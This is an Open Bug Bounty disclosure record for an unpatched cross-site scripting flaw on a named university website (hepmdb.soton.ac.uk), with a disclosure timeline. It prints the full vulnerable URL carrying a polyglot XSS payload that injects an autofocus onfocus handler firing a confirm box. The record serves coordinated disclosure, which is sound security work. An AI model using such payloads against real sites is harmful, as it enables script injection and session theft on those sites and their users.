hepmdb.soton.ac.uk XSS vulnerability

2017-07-0618:55:00

www.openbugbounty.org

JSON

Vulnerable URL:

https://hepmdb.soton.ac.uk/index.php?mod=/%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3C/Title/%3C/script/%3E%3CInput/Autofocus/*/Onfocus=confirm`XSSPOSED`%20//%3E%3CSvg%3E&act;=showmodel&id;=

Details:

Description	Value
Patched:	No
Latest check for patch:	29.09.2017
Vulnerability type:	XSS
Vulnerability status:	Publicly disclosed
Alexa Rank	Unknown / Not calculated
VIP website status:	No
Check hepmdb.soton.ac.uk SSL connection:	(Grade: B)

Coordinated Disclosure Timeline:

Description	Value
Vulnerability submitted via Open Bug Bounty	6 July, 2017 18:55 GMT
Vulnerability existence verified and confirmed	7 July, 2017 05:42 GMT
Generic security notifications sent to website owner	7 July, 2017 05:42 GMT
Vulnerability details disclosed by researcher	29 September, 2017 06:30 GMT

JSON